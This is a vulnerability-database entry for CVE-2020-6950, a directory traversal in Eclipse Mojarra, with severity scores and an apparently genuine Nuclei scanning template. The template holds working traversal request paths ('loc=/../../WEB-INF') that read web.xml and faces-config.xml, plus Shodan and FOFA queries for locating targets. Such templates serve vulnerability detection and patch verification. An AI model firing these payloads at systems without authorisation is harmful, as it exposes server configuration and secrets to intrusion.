Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-6950
HistoryOct 13, 2023 - 4:00 p.m.

Eclipse Mojarra - Local File Read

2023-10-1316:00:06
ProjectDiscovery
github.com
32

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

7.7 High

AI Score

Confidence

High

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

0.039 Low

EPSS

Percentile

91.9%

Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.
id: CVE-2020-6950

info:
  name: Eclipse Mojarra - Local File Read
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.
  reference:
    - https://github.com/eclipse-ee4j/mojarra/commit/cefbb9447e7be560e59da2da6bd7cb93776f7741
    - https://github.com/eclipse-ee4j/mojarra/issues/4571
    - https://nvd.nist.gov/vuln/detail/CVE-2020-6950
    - https://bugs.eclipse.org/bugs/show_bug.cgi?id=550943
    - https://www.oracle.com/security-alerts/cpuapr2022.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-6950
    cwe-id: CWE-22
    epss-score: 0.03924
    epss-percentile: 0.91792
    cpe: cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: eclipse
    product: mojarra
    shodan-query: html:"javax.faces.resource"
    fofa-query: body="javax.faces.ViewState"
  tags: cve,cve2020,mojarra,lfi,eclipse

http:
  - method: GET
    path:
      - "{{BaseURL}}/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF"
      - "{{BaseURL}}/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF"
      - "{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF"
      - "{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/xml")'
          - 'contains_all(body, "<web-app", "<servlet>") || contains_all(body, "<faces-config", "</faces-config>")'
        condition: and
# digest: 490a00463044022057bb165b69bcd6a648332fd9637fcd2daef818312700aca402b735e74e3bab7a022039da250736c313317b03ff12fb722f320b0ecfd1338eab919975feb262de5717:922c64590222798bb761d5b6d8e72950

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

7.7 High

AI Score

Confidence

High

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

0.039 Low

EPSS

Percentile

91.9%